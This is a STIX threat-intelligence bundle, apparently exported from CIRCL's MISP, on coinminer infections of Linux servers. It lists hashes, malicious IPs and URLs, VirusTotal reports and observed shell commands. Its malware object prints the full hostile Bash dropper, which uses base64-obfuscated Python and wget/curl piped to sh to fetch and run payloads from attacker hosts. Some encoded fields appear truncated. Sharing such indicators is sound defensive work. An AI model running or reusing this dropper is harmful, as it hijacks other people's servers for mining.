2023-04-21 14:44:17 +00:00
{
"type" : "bundle" ,
"id" : "bundle--5cf22f74-759c-4744-90eb-4300950d210f" ,
"objects" : [
{
"type" : "identity" ,
"spec_version" : "2.1" ,
"id" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T09:26:08.000Z" ,
"modified" : "2019-06-01T09:26:08.000Z" ,
"name" : "CIRCL" ,
"identity_class" : "organization"
} ,
{
"type" : "report" ,
"spec_version" : "2.1" ,
"id" : "report--5cf22f74-759c-4744-90eb-4300950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T09:26:08.000Z" ,
"modified" : "2019-06-01T09:26:08.000Z" ,
"name" : "Linux server infection with coinminers (derived from original post with iptables rules)" ,
"published" : "2019-06-01T09:26:35Z" ,
"object_refs" : [
"indicator--5cf22f90-03e4-42e8-ad21-46e2950d210f" ,
"indicator--5cf23560-1a54-4bd1-b253-4cbc950d210f" ,
"indicator--5cf23658-5858-45ec-bd98-437b950d210f" ,
"observed-data--5cf2421b-bba0-4844-8d28-43c9950d210f" ,
"file--5cf2421b-bba0-4844-8d28-43c9950d210f" ,
"artifact--5cf2421b-bba0-4844-8d28-43c9950d210f" ,
"indicator--5cf22fbc-cecc-465b-a261-4385950d210f" ,
"indicator--f0280498-3ef9-436d-ab5f-41ce5352bca8" ,
"x-misp-object--35f44d09-4103-4f11-a1dd-74fb99172734" ,
"x-misp-object--5cf234e6-2cd4-43cc-8337-4fa1950d210f" ,
"indicator--bd7566b3-8da1-4830-9ee4-2d705598919f" ,
"x-misp-object--49e52bb6-f81f-4516-99e4-e2e04f1c0bc7" ,
"x-misp-object--5cf235f9-14d0-4bcf-9d72-4b5f950d210f" ,
"malware--5cf236e8-c18c-45ff-852e-4be0950d210f" ,
"indicator--5cf23717-673c-48de-9834-476d950d210f" ,
"indicator--5cf237b6-06bc-4e57-ad7e-31bb950d210f" ,
"malware--5cf23812-2ae8-4feb-8e8b-4a1f950d210f" ,
"indicator--5cf238a2-0e5c-447e-a584-4072950d210f" ,
"indicator--5cf2397c-b0a0-475d-b764-4c2a950d210f" ,
"indicator--5cf23a31-1db8-4b41-81af-4416950d210f" ,
"indicator--5cf23ef7-5138-4a1f-b773-4766950d210f" ,
"indicator--5cf23fe9-25c8-47df-a38a-4325950d210f" ,
"indicator--5cf24083-6de0-42e3-9ae7-4129950d210f" ,
"indicator--5cf240b4-352c-40a3-8aba-40b5950d210f" ,
"x-misp-object--5cf241f4-75b0-43e7-80fe-4487950d210f" ,
"x-misp-object--5cf24424-33b4-488b-8202-4db5950d210f" ,
2023-12-14 14:30:15 +00:00
"relationship--f5b7e7ab-0b50-4285-ac22-baa90eafe67c" ,
"relationship--60ac44d9-d531-45b1-8a21-5f140e87475b" ,
"relationship--55d8e5a8-d2fd-4f7e-85ae-eec938dd410d" ,
"relationship--00d63c2c-7766-4631-b4fc-f6ee684f8368" ,
"relationship--1a6cb2e6-bfdb-4e77-b5c7-a6ead29e34a8" ,
"relationship--40b561d5-1976-4f05-9e7a-499673ffd659" ,
"relationship--738f0138-0374-45b7-8664-00085370a299" ,
"relationship--6496c0e0-204b-4b7a-83c0-37b8e4d766fa" ,
"relationship--5e50743c-8193-4cbb-a7e5-84019278877f" ,
"relationship--51506d5e-74d1-4cc9-88a3-aaebf0ba002f" ,
"relationship--b7090b3e-332a-4674-9057-ed0e4c8f85fd" ,
"relationship--bab30b8c-f1b5-4fff-b7f5-36a20a0bd247" ,
"relationship--77c6b2dd-eed7-4784-8e1f-22ee4a978e57" ,
"relationship--81b16a52-9808-4b78-abbb-6255ed8ad8ee"
2023-04-21 14:44:17 +00:00
] ,
"labels" : [
"Threat-Report" ,
"misp:tool=\"MISP-STIX-Converter\"" ,
"type:OSINT" ,
"osint:lifetime=\"perpetual\"" ,
"osint:certainty=\"50\"" ,
"misp-galaxy:malpedia=\"Coinminer\"" ,
"misp-galaxy:tool=\"CoinMiner\"" ,
"misp-galaxy:mitre-attack-pattern=\"Resource Hijacking - T1496\"" ,
"misp-galaxy:mitre-attack-pattern=\"Command-Line Interface - T1059\""
] ,
"object_marking_refs" : [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cf22f90-03e4-42e8-ad21-46e2950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T07:56:00.000Z" ,
"modified" : "2019-06-01T07:56:00.000Z" ,
"description" : "Coinminer" ,
"pattern" : "[file:hashes.MD5 = '2cb968c8d33d89af2ec03df8fd875ab6']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-06-01T07:56:00Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Artifacts dropped"
}
] ,
"labels" : [
"misp:type=\"md5\"" ,
"misp:category=\"Artifacts dropped\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cf23560-1a54-4bd1-b253-4cbc950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T08:20:48.000Z" ,
"modified" : "2019-06-01T08:20:48.000Z" ,
"description" : "Coinminer" ,
"pattern" : "[file:hashes.SHA256 = '0bc0ea8a037baa0154c4c136bf7a3167cfd81f3c33b2969855d4ef5ce0090e72']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-06-01T08:20:48Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Artifacts dropped"
}
] ,
"labels" : [
"misp:type=\"sha256\"" ,
"misp:category=\"Artifacts dropped\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cf23658-5858-45ec-bd98-437b950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T08:24:56.000Z" ,
"modified" : "2019-06-01T08:24:56.000Z" ,
"pattern" : "[url:value = 'http://165.227.140.184/tmp/nww']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-06-01T08:24:56Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "observed-data" ,
"spec_version" : "2.1" ,
"id" : "observed-data--5cf2421b-bba0-4844-8d28-43c9950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T09:15:07.000Z" ,
"modified" : "2019-06-01T09:15:07.000Z" ,
"first_observed" : "2019-06-01T09:15:07Z" ,
"last_observed" : "2019-06-01T09:15:07Z" ,
"number_observed" : 1 ,
"object_refs" : [
"file--5cf2421b-bba0-4844-8d28-43c9950d210f" ,
"artifact--5cf2421b-bba0-4844-8d28-43c9950d210f"
] ,
"labels" : [
"misp:type=\"attachment\"" ,
"misp:category=\"Payload delivery\""
]
} ,
{
"type" : "file" ,
"spec_version" : "2.1" ,
"id" : "file--5cf2421b-bba0-4844-8d28-43c9950d210f" ,
"name" : "liu.png" ,
"content_ref" : "artifact--5cf2421b-bba0-4844-8d28-43c9950d210f"
} ,
{
"type" : "artifact" ,
"spec_version" : "2.1" ,
"id" : "artifact--5cf2421b-bba0-4844-8d28-43c9950d210f" ,
"payload_bin" : " i V B O R w 0 K G g o A A A A N S U h E U g A A A y 0 A A A O j C A Y A A A C 2 q u u u A A A A B H N C S V Q I C A g I f A h k i A A A A B l 0 R V h 0 U 29 m d H d h c m U A Z 25 v b W U t c 2 N y Z W V u c 2 h v d O 8 D v z 4 A A C A A S U R B V H i c 7 N 13 n N 1 X f e f / 1 z n f d r + 3 T 5E0 I 2 k k W 90 q 7 i H 0 j u k l B I g p + 8 u C M R B K 2 k J + 2 Q R + Z R O W T T a / 8 C O E X V o S N i R A I K F j b G y w j e M m X G T 1 X q b 3 u f 1 + 6 z n 7 x 5 X H k q t s y 5 q x f Z 6 P h x 56 z J 0 7554589 X o + 77 n n M 8 R W m u N Y R i G Y R i G Y R j G I i U X u g O G Y R i G Y R i G Y R i P x o Q W w z A M w z A M w z A W N R N a D M M w D M M w D M N Y 1 E x o M Q z D M A z D M A x j U T O h x T A M w z A M w z C M R c 2 E F s M w D M M w D M M w F j U T W g z D M A z D M A z D W N R M a D E M w z A M w z A M Y 1 E z o c U w D M M w D M M w j E X N h B b D M A z D M A z D M B Y 1E1 o M w z A M w z A M w 1 j U T G g x D M M w D M M w D G N R M 6 H F M A z D M A z D M I x F z Y Q W w z A M w z A M w z A W N R N a D M M w D M M w D M N Y 1 E x o M Q z D M A z D M A x j U T O h x T A M w z A M w z C M R c 2 E F s M w D M M w D M M w F j U T W g z D M A z D M A z D W N R M a D E M w z A M w z A M Y 1 E z o c U w D M M w D M M w j E X N h B b D M A z D M A z D M B Y 1E1 o M w z A M w z A M w 1 j U 7 I X u w L l w Z G i c s e k K Y 9 M V x q e n k L Z N x v Z I o g Q L i e N I g i Q g U i l L e r t Y 1 t v F i p 5 u N g z 0 L 3 T X D c M w D M M w D O N Z T 2 i t 9 U J 34 m y r 1 h v c s 3 s / + 48 N c X h o n F R Y p F q Q x g l a B y z r L r G 0 u x v f d n E s G 6 U V s 40 a x 8 f G i K U g Q Z I q h S s c 1 q 7 o Y + P A C i 7 f s o 6 + 3 u 6 F / t Y M w z A M w z A M 41 n n G R N a 6 o 0 6 x 4 a G O D Y 0 z M j E F C e G R g g S R a o l i d I k G l Q S I + I m 3 c U c P a U i G c t G K E 2 c J M z U q 0 x W K p 3 Q o i C K E 9 I 4 J Q 1 T 0 j i m 1 W q x o n 8 p r 3 r R C 3 j F i 1 / I y u V m F s Y w D M M w D M M w z o W n f W i Z r c x x 14672 b 1 / L 0 m q U A q E t J i r 1 o l T j Z Y O U Z K i t Q B S H B 3 i W R r f 9 X C E w L U s b M c h T B O 0 b Z N K S R A n z F U q T E 9 M M z 4 y z t z M L G i Y q 1 R I 4 w T X d X j 7 b 76 F D 7 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
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cf22fbc-cecc-465b-a261-4385950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T07:56:44.000Z" ,
"modified" : "2019-06-01T07:56:44.000Z" ,
"pattern" : "[(network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '165.227.140.184') AND network-traffic:dst_port = '80']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-06-01T07:56:44Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "network"
}
] ,
"labels" : [
"misp:name=\"ip-port\"" ,
"misp:meta-category=\"network\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--f0280498-3ef9-436d-ab5f-41ce5352bca8" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T08:19:23.000Z" ,
"modified" : "2019-06-01T08:19:23.000Z" ,
"pattern" : "[file:hashes.MD5 = '2cb968c8d33d89af2ec03df8fd875ab6' AND file:hashes.SHA1 = '535fd49cf76e48d610f2e80d0ce16d722ba6b949' AND file:hashes.SHA256 = '7a38a2d4512b775da7ea7c98e03df1ae348493ce512d761013ae123da4379805']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-06-01T08:19:23Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--35f44d09-4103-4f11-a1dd-74fb99172734" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T07:57:37.000Z" ,
"modified" : "2019-06-01T07:57:37.000Z" ,
"labels" : [
"misp:name=\"virustotal-report\"" ,
"misp:meta-category=\"misc\""
] ,
"x_misp_attributes" : [
{
"type" : "datetime" ,
"object_relation" : "last-submission" ,
"value" : "2019-02-25T10:14:54" ,
"category" : "Other" ,
"comment" : "Coinminer" ,
"uuid" : "ab588995-f90a-4487-8efd-ec53c6e3fdfd"
} ,
{
"type" : "link" ,
"object_relation" : "permalink" ,
"value" : "https://www.virustotal.com/file/7a38a2d4512b775da7ea7c98e03df1ae348493ce512d761013ae123da4379805/analysis/1551089694/" ,
"category" : "External analysis" ,
"comment" : "Coinminer" ,
"uuid" : "dc266a97-294a-48dd-9ea8-4e2d3ec4f8e4"
} ,
{
"type" : "text" ,
"object_relation" : "detection-ratio" ,
"value" : "6/53" ,
"category" : "Artifacts dropped" ,
"comment" : "Coinminer" ,
"uuid" : "c278894e-a2a2-40aa-8ae3-ec6d45acc2e9"
}
] ,
"x_misp_meta_category" : "misc" ,
"x_misp_name" : "virustotal-report"
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--5cf234e6-2cd4-43cc-8337-4fa1950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T08:18:46.000Z" ,
"modified" : "2019-06-01T08:18:46.000Z" ,
"labels" : [
"misp:name=\"shell-commands\"" ,
"misp:meta-category=\"misc\""
] ,
"x_misp_attributes" : [
{
"type" : "text" ,
"object_relation" : "language" ,
"value" : "Bash" ,
"category" : "Other" ,
"uuid" : "5cf234e6-4da8-49b5-b064-4e40950d210f"
} ,
{
"type" : "text" ,
"object_relation" : "state" ,
"value" : "Malicious" ,
"category" : "Other" ,
"uuid" : "5cf234e6-ee88-4671-90c3-4ee5950d210f"
} ,
{
"type" : "text" ,
"object_relation" : "shell-command" ,
"value" : "/bin/sh /usr/lib/ConsoleKit/run-session.d/pam-foreground-compat.ck session_removed" ,
"category" : "Other" ,
"uuid" : "5cf234e6-c614-47da-a863-46e8950d210f"
} ,
{
"type" : "text" ,
"object_relation" : "shell-command" ,
"value" : "sh -c /var/tmp/sde ryuf" ,
"category" : "Other" ,
"uuid" : "5cf234e6-9c48-4372-bab4-42b0950d210f"
} ,
{
"type" : "text" ,
"object_relation" : "shell-command" ,
"value" : "sh -c /tmp/sde ryuf" ,
"category" : "Other" ,
"uuid" : "5cf234e6-abec-4654-a935-4354950d210f"
}
] ,
"x_misp_meta_category" : "misc" ,
"x_misp_name" : "shell-commands"
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--bd7566b3-8da1-4830-9ee4-2d705598919f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T08:24:11.000Z" ,
"modified" : "2019-06-01T08:24:11.000Z" ,
"pattern" : "[file:hashes.MD5 = '3694010708de4a2c916e34cbe2a0ed60' AND file:hashes.SHA1 = '6faf93653c6f64d7aa814c878fed112a6db992f6' AND file:hashes.SHA256 = '0bc0ea8a037baa0154c4c136bf7a3167cfd81f3c33b2969855d4ef5ce0090e72']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-06-01T08:24:11Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--49e52bb6-f81f-4516-99e4-e2e04f1c0bc7" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T08:20:59.000Z" ,
"modified" : "2019-06-01T08:20:59.000Z" ,
"labels" : [
"misp:name=\"virustotal-report\"" ,
"misp:meta-category=\"misc\""
] ,
"x_misp_attributes" : [
{
"type" : "datetime" ,
"object_relation" : "last-submission" ,
"value" : "2019-02-10T19:49:48" ,
"category" : "Other" ,
"comment" : "Coinminer" ,
"uuid" : "266fe354-b65d-425a-9c9e-3544e0c5a9f1"
} ,
{
"type" : "link" ,
"object_relation" : "permalink" ,
"value" : "https://www.virustotal.com/file/0bc0ea8a037baa0154c4c136bf7a3167cfd81f3c33b2969855d4ef5ce0090e72/analysis/1549828188/" ,
"category" : "External analysis" ,
"comment" : "Coinminer" ,
"uuid" : "e4df3142-d2dd-48ed-81d8-dada676b54e3"
} ,
{
"type" : "text" ,
"object_relation" : "detection-ratio" ,
"value" : "1/58" ,
"category" : "Artifacts dropped" ,
"comment" : "Coinminer" ,
"uuid" : "a64f16e1-a212-4a8f-ba03-dbc5fed0c2bd"
}
] ,
"x_misp_meta_category" : "misc" ,
"x_misp_name" : "virustotal-report"
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--5cf235f9-14d0-4bcf-9d72-4b5f950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T08:23:21.000Z" ,
"modified" : "2019-06-01T08:23:21.000Z" ,
"labels" : [
"misp:name=\"shell-commands\"" ,
"misp:meta-category=\"misc\""
] ,
"x_misp_attributes" : [
{
"type" : "text" ,
"object_relation" : "language" ,
"value" : "Bash" ,
"category" : "Other" ,
"uuid" : "5cf235f9-bef4-4265-ad47-48c2950d210f"
} ,
{
"type" : "text" ,
"object_relation" : "state" ,
"value" : "Malicious" ,
"category" : "Other" ,
"uuid" : "5cf235f9-9bfc-4e50-9433-44d2950d210f"
} ,
{
"type" : "text" ,
"object_relation" : "shell-command" ,
"value" : "atd" ,
"category" : "Other" ,
"uuid" : "5cf235f9-a640-4b3b-8627-4592950d210f"
} ,
{
"type" : "text" ,
"object_relation" : "shell-command" ,
"value" : "/bin/sh /usr/lib/ConsoleKit/run-session.d/pam-foreground-compat.ck session_removed" ,
"category" : "Other" ,
"uuid" : "5cf235f9-91cc-411f-8124-4241950d210f"
}
] ,
"x_misp_meta_category" : "misc" ,
"x_misp_name" : "shell-commands"
} ,
{
"type" : "malware" ,
"spec_version" : "2.1" ,
"id" : "malware--5cf236e8-c18c-45ff-852e-4be0950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T08:42:17.000Z" ,
"modified" : "2019-06-01T08:42:17.000Z" ,
"is_family" : false ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "misc"
}
] ,
"implementation_languages" : [
"Bash"
] ,
"labels" : [
"misp:name=\"script\"" ,
"misp:meta-category=\"misc\"" ,
"misp:to_ids=\"False\""
] ,
"x_misp_script" : "#!/bin/sh\r\nif ! ps -ax | grep -v grep | grep \"[ ]\"$ >/dev/null; then\r\n\t nohup python -c 'import os,urllib; proxies = {\"http\": \"http://41.203.146.142:8080\"};f=open(\"/tmp/hsos\",\"wb\");f.write(urllib.urlopen(\"http://165.227.140.184/tmp/ofd\",proxies=proxies\r\n).read());f.close();os.system(\"chmod +x /tmp/hsos\");os.system(\"chmod 777 /tmp/hsos\");os.system(\"/tmp/hsos\")' &\r\n\t sleep 3\r\n\t nohup python3 -c 'import urllib.request; urllib.request.urlretrieve(\"http://165.227.140.184/tmp/ofd\", \"/tmp/vov\");os.system(\"chmod 7777 /tmp/vov\");os.system(\"chmod +x /tmp/vov\");os\r\n.system(\"/tmp/vov\")' 2>&1\r\n\t sleep 3\r\n\t nohup python -c 'exec(\"aW1wb3J0IG9zLHVybGxpYixiaW5hc2NpaTsgbD1iaW5hc2NpaS5iMmFfaGV4KG9zLnVyYW5kb20oNCkpOyBoZD11cmxsaWIudXJscmV0cmlldmUgKCJodHRwOi8vODcuMjM2LjIxMi4yMzcvdG1wL29mZCIsI\r\nCIvdG1wLyIrbCk7b3Muc3lzdGVtKCJjaG1vZCA3Nzc3IC90bXAvIitsKTtvcy5zeXN0ZW0oImNobW9kICt4IC90bXAvIitsKTsgb3Muc3lzdGVtKCIvdG1wLyIrbCk=\".decode(\"base64\"))' 2>&1\r\n\t sleep 3\r\n\t nohup python -c 'exec(\"aW1wb3J0IG9zLHVybGxpYixiaW5hc2NpaTtsPWJpbmFzY2lpLmIyYV9oZXgob3MudXJhbmRvbSg0KSk7aD1vcy5wYXRoLmV4cGFuZHVzZXIoIn4vIitsKTtwcm94aWVzPXsiaHR0cCI6Imh0dHA6Ly8yMTEuM\r\njQuMTAzLjIyODo4MCJ9O2Y9b3BlbihoLCJ3YiIpO2Yud3JpdGUodXJsbGliLnVybG9wZW4oImh0dHA6Ly84Ny4yMzYuMjEyLjIzNy90bXAvb2ZkIixwcm94aWVzPXByb3hpZXMpLnJlYWQoKSk7Zi5jbG9zZSgpO29zLnN5c3RlbSgiY2htb2QgNzc3NyB\r\n7fSIuZm9ybWF0KGgpKTtvcy5zeXN0ZW0oImNobW9kICt4IHt9Ii5mb3JtYXQoaCkpOyBvcy5zeXN0ZW0oInt9ICYiLmZvcm1hdChoKSk=\".decode(\"base64\"))' 2>&1\r\n\t wget -O - http://185.165.169.6/jp/_j.sh|sh ; curl http://185.165.169.6/jp/_j.jpg|sh\r\nfi" ,
"x_misp_state" : "Malicious"
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cf23717-673c-48de-9834-476d950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T08:28:07.000Z" ,
"modified" : "2019-06-01T08:28:07.000Z" ,
"pattern" : " [ f i l e : h a s h e s . M D 5 = ' 9 f 189 f 26 d a 1206151 c e 39e5 a a b 269 f f 6 ' A N D f i l e : h a s h e s . S H A 1 = ' 4 e e 5040 a f 71 f 5 f d 8080 f 0 f 0 b e d 2672 b c 1 f 68 d 1e1 ' A N D f i l e : h a s h e s . S H A 256 = ' 1 f c 77 c e b 1 f f a d 48 a 0 67 c 9 c 83 b c 1 c 5347e4 b 359 b 4520859 b 91 f c 14 f e d c 29 a 8803 ' A N D f i l e : n a m e = ' o f d ' A N D f i l e : s i z e = ' 56392 ' A N D ( f i l e : c o n t e n t _ r e f . p a y l o a d _ b i n = ' U E s D B B Q A C Q A I A I R D w U 4 m B t S U L 9 k A A E j c A A A g A B w A O W Y x O D l m M j Z k Y T E y M D Y x N T F j Z T M 5 Z T V h Y W I y N j l m Z j Z V V A k A A x c 38 l w X N / J c d X g L A A E E I Q A A A A Q h A A A A 7 Q c f j E b W 4 M / H U p T D E U o f 9 y + C k I h e 1 h u H m u V y V A 1 o e W / 2 M H g U B t H e 6 B q O 1 n N T 0 a t U Z 9 C H F L Q J V X 1 h n B i a s A e h K 5 + I C 2 G b 9 l m B u H E G x e g z g L + p x f r W B F h D 2 t m n x z / R z o 8 + z w Z S M Y J 0 a D c l v C K S P 6 V 9 w 3 e x h + N 0 v M 6 E h e s X A 4 r 4 h G V n 8 Q C h w c M D 3 v j b 3 r m b s M p 2 I o N f W F h J H 4 m i 5 F N x B E p e S z A g J K G R 36 D 0 3 I T y V z P 4 P s e L 5 + v 7 F T X t Q 57 L J G O b B F R c i 81 r w q z U W s o K e V j O c 0 X s i C j V F p A V 5 T W T O T Z Q C n Y f x x q Q R p X x z s D / 4 h / a A f Y 1 p f 1 r d r 4 s 3 w d X l 9 g R q g f o 9 X a N J f b / J 12 G F q q v x h 8 m t t p / p f p p W z O Q k I Y J S B 4 B p c v 4 V 6 W y X 0 i f F I v 2 Z H 2 e J Y W 7 e s a 9 C J K L x m X W V H 4 y a u 4 I Q g J F 7 a 8 